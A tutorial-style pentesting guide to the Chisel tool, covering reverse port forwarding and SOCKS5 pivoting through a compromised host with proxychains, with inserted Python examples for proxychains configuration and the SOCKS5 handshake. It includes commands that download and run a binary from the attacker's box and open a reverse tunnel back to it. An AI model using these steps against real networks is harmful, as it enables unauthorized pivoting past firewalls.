Chisel
Contents
Background of Port forwarding (page 3)
Introduction to Chisel (page 3)
Establish a connection with the remote host (page 3)
Installation (page 4)
Local port forwarding Example - 1 (page 5)
Local Port forwarding Example - 2 (page 7)
Establish Connection with SOCKS5 Proxy (page 9)
Configure SOCKS5 in proxychains4.conf file (page 12)
Banner grabbing of the remote host with proxychains (page 13)
Telnet Connection using proxychains (page 13)
FTP connection using proxychains (page 14)
VNC Viewer connection using proxychains (page 15)
Conclusion (page 17)
Page 2 of 17
A Detailed Guide on Chisel
Introduction to Chisel
Chisel is an open-source tool written in Go (Golang), mainly used for passing through firewalls,
though it can also provide a secure endpoint into your network. It is a fast TCP/UDP tunnel,
transported over HTTP and secured via SSH. It requires two components to establish a connection
between a remote host and the attacking box: the attacking box acts as the server and the remote
host acts as the client.
Establish a connection with the remote host
ssh [email protected]
netstat -antp
Installation
Chisel installation is straightforward in Kali Linux, as it is available as a distribution package. We
can install it using the command below.
Local port forwarding Example - 1
Reverse port forwarding lets us connect to services hosted in the remote host's internal network. Here
we use the chisel utility to achieve this, which takes several steps. In the first step, we set up a
reverse server on our base machine (Kali), specifying port number 5000.
Once our Chisel server is ready and reverse tunnelling is enabled, we need to transfer a chisel
binary to the remote host. The chisel binaries can be downloaded from the official repository
according to the system architecture; all the latest binaries are listed under the releases tab. As we
will test it on a Linux system with AMD64 architecture, we selected the highlighted one.
After downloading, the file is saved in the Downloads folder as a compressed archive, which we
extract with the gunzip utility. As mentioned earlier, we need to transfer it to the target system to
set chisel up as a client. To transfer the file, we start a Python web server on our local system,
which hosts the file on port 80.
We download the chisel binary into the remote host's /tmp directory, where every user is allowed to
write files. We then make the file executable: a file downloaded into /tmp as a low-privileged user
has read permission only, so without adjusting its permissions we cannot run it. To establish a
remote connection, we need a chisel server and a chisel client: the chisel server is the attacking box
and the chisel client is the target machine. As we already set up a chisel server on port 5000
earlier, we now connect to it. In this example, we run chisel in client mode and give it the server's IP
address and port (5000), followed by the port to expose on the server (4444) and the localhost port
on which the HTTP service is hosted internally on the remote system (8080).
wget 192.168.1.205/chisel_1.7.7_linux_amd64
chmod 777 chisel_1.7.7_linux_amd64
./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080
Local Port forwarding Example - 2
There is another way to access the HTTP service, this time using the attacker's IP address instead of
the loopback interface. To achieve this, we need to install chisel on the target machine. In this
example, the target is an Ubuntu system. As chisel is written in Go, we install Go on the target
system using the command below.
Next, we download chisel from its official repository and build it on the target system. go build is
an automatic build tool that aims to replace Makefiles for simple projects written in Go. It creates a
dependency graph of all local imports and compiles them in the correct order using the gc Go
compiler. The -ldflags option stands for linker flags and passes flags to the underlying linker in the
Go toolchain. The -s and -w linker flags are not strictly needed, but they reduce the size of the
resulting binary. After navigating to the downloaded chisel folder, we simply build it with go build.
Then we set up a chisel server on port 5000 on the attacking box, as in the previous example. In the
previous example, we reached the service hosted in the remote internal network through the
attacking box's loopback interface. This time we will access the HTTP service on port 8888 on the
attacker side. The Ubuntu machine, our client, establishes a connection with the remote server
(192.168.1.205) on port 5000. Once the tunnel is created, it gives access to the HTTP service hosted
on the loopback interface (127.0.0.1) via remote port 8888.
Once the connection to the chisel server is established, we can access the HTTP service from the
attacking box on port 8888.
Establish Connection with SOCKS5 Proxy
During an internal assessment, we may compromise a system that communicates with another
system through a different adapter or on a different subnet. This can be checked with
ipconfig/ifconfig, which shows whether the system is connected to another network via a
different adapter. In such scenarios, local port forwarding will not work, and we have to identify
which ports are open for outbound traffic. As shown in the screenshot below, we could not
establish a connection with the remote host.
To overcome this issue, we have to go through multiple steps. First, we set up a chisel server on the
attacking box on port 8000.
Then we connect to the chisel server from the Ubuntu box, requesting a remote SOCKS proxy. Like
most other proxy types, a SOCKS proxy hides the client's IP address and is often used to bypass
geo-restrictions. Unlike an HTTP proxy, SOCKS does not interpret the web traffic it relays; it is
mainly used to reach services behind firewalls that restrict regular client access. All
communication through the SOCKS5 proxy can be done with utilities such as proxychains or proxychains4.
-p: listening port of the server (attacking box)
We can also access an individual port on the target using the command below. We connect to the
server hosted on the attacking machine and then reach the target service through the tunnel.
We can also enable the SOCKS proxy when starting the chisel server. In the example below, we
set up a chisel server on port 9001 with the socks5 proxy enabled.
All of the above is configured at the system level, but how will the browser know that we want to
reach the HTTP service through it? We configure the browser as well; otherwise, we cannot browse
any HTTP or HTTPS services. To do that, we open the browser's proxy settings, choose SOCKS, set
the host to the loopback interface address, 127.0.0.1, and select the SOCKS version (SOCKS4 or
SOCKS5) that matches the proxy in use. In this example, we use SOCKS5 and port number 1080,
with no proxy for the loopback interface. The same can be done with the FoxyProxy add-on
available for Mozilla Firefox.
Now we can access the services without any issues. We can verify this by accessing the target HTTP
service, where the request is sent through the proxy.
Configure SOCKS5 in proxychains4.conf file
If proxychains4 is not yet configured for the socks5 proxy, we can add an entry to its configuration
file using any text editor. The configuration file is located in /etc as proxychains4.conf.
To edit the configuration file, we comment out the socks4 proxy if one is configured by default and
add a socks5 entry for the loopback interface with the port number. Any port can be used, but in this
example we use port 1080.
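The edit described above, as an added Python example that is not part of the original guide: it comments out any active socks4 entry under [ProxyList] (the default file ships with socks4 127.0.0.1 9050) and adds the socks5 127.0.0.1 1080 line once, so running it twice leaves the file unchanged. The path is the one named in the text; the function names are my own.

```python
import re
from pathlib import Path

SOCKS5_ENTRY = "socks5 127.0.0.1 1080"   # chisel's socks listener as used in this guide

def enable_socks5(conf_text: str, entry: str = SOCKS5_ENTRY) -> str:
    """Return the config with active socks4 entries under [ProxyList] commented out
    and `entry` present exactly once at the end of that section (idempotent)."""
    out, in_list, last_idx, present = [], False, None, False
    for line in conf_text.splitlines():
        s = line.strip()
        if s.startswith("["):                       # section header, e.g. [ProxyList]
            in_list = s.lower() == "[proxylist]"
        elif in_list and re.match(r"socks4\s", s):  # e.g. the default socks4 127.0.0.1 9050
            line = "# " + line
        elif in_list and s == entry:
            present = True
        if in_list:
            last_idx = len(out)                     # remember the last line of [ProxyList]
        out.append(line)
    if not present:
        if last_idx is None:                        # no [ProxyList] section at all
            out += ["[ProxyList]", entry]
        else:
            out.insert(last_idx + 1, entry)
    return "\n".join(out) + "\n"

def update_file(path: str = "/etc/proxychains4.conf") -> None:
    """Rewrite the real file in place (needs root)."""
    p = Path(path)
    p.write_text(enable_socks5(p.read_text()))
```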
Banner grabbing of the remote host with proxychains
Let's grab the banners of ports 21, 23, and 5900. Port 21 belongs to the File Transfer Protocol, 23 to
telnet, and 5900 to the VNC server. FTP transfers files between hosts, and telnet provides a
remote command-line session. VNC, on the other hand, provides a GUI-based remote session. To
grab the banners or access the remote host, we prefix every command with proxychains so the
request is sent through the tunnel we created. The output confirms that all three ports are open. In
our command, we used the -zvn options, which stand for:
-z Specifies that nc should only scan for listening daemons without sending any data to them.
-v Verbose output.
-n Numeric-only IP addresses, no DNS lookups.
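To show what proxychains does on the wire when nc, ftp or telnet is sent through the SOCKS5 proxy on 127.0.0.1:1080 set up in the previous sections, here is an added Python example that is not part of the original guide or of chisel itself: it builds the RFC 1928 greeting and CONNECT request (IPv4, IPv6 or a hostname the proxy resolves), decodes the proxy's reply, and wraps the handshake in a helper that returns a connected socket. Function names and any target addresses are my own.

```python
import ipaddress, socket, struct

# RFC 1928 field values (constructed example, not code from the original guide or chisel)
VER, NO_AUTH, CMD_CONNECT = 5, 0x00, 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY = {0: "succeeded", 1: "general SOCKS server failure", 2: "not allowed by ruleset",
         3: "network unreachable", 4: "host unreachable", 5: "connection refused",
         6: "TTL expired", 7: "command not supported", 8: "address type not supported"}
def build_greeting() -> bytes:
    """Client hello offering only 'no authentication' (a proxy entry with no user/pass)."""
    return bytes([VER, 1, NO_AUTH])
def build_connect(host: str, port: int) -> bytes:
    """CONNECT request; a hostname is sent as ATYP 3 so the proxy resolves it (proxy_dns)."""
    try:
        ip = ipaddress.ip_address(host)
        atyp, dst = (ATYP_IPV4 if ip.version == 4 else ATYP_IPV6), ip.packed
    except ValueError:
        raw = host.encode("idna")
        if len(raw) > 255:
            raise ValueError("hostname too long for SOCKS5")
        atyp, dst = ATYP_DOMAIN, bytes([len(raw)]) + raw
    return bytes([VER, CMD_CONNECT, 0x00, atyp]) + dst + struct.pack("!H", port)
def parse_reply(data: bytes):
    """Decode the proxy's reply into (ok, message, bound_addr, bound_port)."""
    if len(data) < 4 or data[0] != VER:
        raise ValueError("not a SOCKS5 reply")
    rep, atyp, body = data[1], data[3], data[4:]
    if atyp in (ATYP_IPV4, ATYP_IPV6):
        n = 4 if atyp == ATYP_IPV4 else 16
        bound, rest = str(ipaddress.ip_address(body[:n])), body[n:]
    elif atyp == ATYP_DOMAIN:
        bound, rest = body[1:1 + body[0]].decode(), body[1 + body[0]:]
    else:
        raise ValueError(f"unknown address type {atyp}")
    if len(rest) < 2:
        raise ValueError("truncated reply")
    return rep == 0, REPLY.get(rep, f"unknown reply {rep}"), bound, struct.unpack("!H", rest[:2])[0]
def socks5_connect(dst_host, dst_port, proxy=("127.0.0.1", 1080), timeout=5):
    """Open a TCP connection to dst through the SOCKS5 proxy, as proxychains does for nc/ftp/telnet."""
    s = socket.create_connection(proxy, timeout=timeout)
    s.sendall(build_greeting())
    if s.recv(2) != bytes([VER, NO_AUTH]):
        s.close(); raise ConnectionError("proxy rejected the no-auth method")
    s.sendall(build_connect(dst_host, dst_port))
    ok, msg, _, _ = parse_reply(s.recv(262))  # longest reply: 4 + 1 + 255 + 2 bytes
    if not ok:
        s.close(); raise ConnectionError(f"SOCKS5 CONNECT failed: {msg}")
    return s
```

A reply code other than 0 (for example 5, connection refused) is the proxy telling you the remote port is closed from its vantage point, which is the same information nc -zv reports through proxychains.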
FTP connection using proxychains
FTP (File Transfer Protocol) is a network protocol for transmitting files between computers over
Transmission Control Protocol/Internet Protocol (TCP/IP) connections. Within the TCP/IP suite, FTP is
considered an application-layer protocol. Let's connect with the same credentials we used for telnet.
We connected to FTP successfully, and with the ls command we can list the files available in the directory.
VNC Viewer connection using proxychains
In the last example, we connect with VNC Viewer. VNC Viewer runs on the local computer or mobile
device you control from: a computer, tablet, or smartphone with VNC Viewer installed can access and
control a computer in another location. The service runs on its default port, 5900. To connect to
VNC through the tunnel, we run the vncviewer utility with the remote IP address through
proxychains, and we receive a GUI-based session.
Conclusion:
We have briefly explored chisel, which makes internal assessments much easier whenever port
forwarding is needed. We covered multiple techniques for establishing a remote session with chisel,
with and without a SOCKS5 proxy, and looked at the role of proxychains in a tunnelled connection. I
hope you have learned something new today. Happy hacking!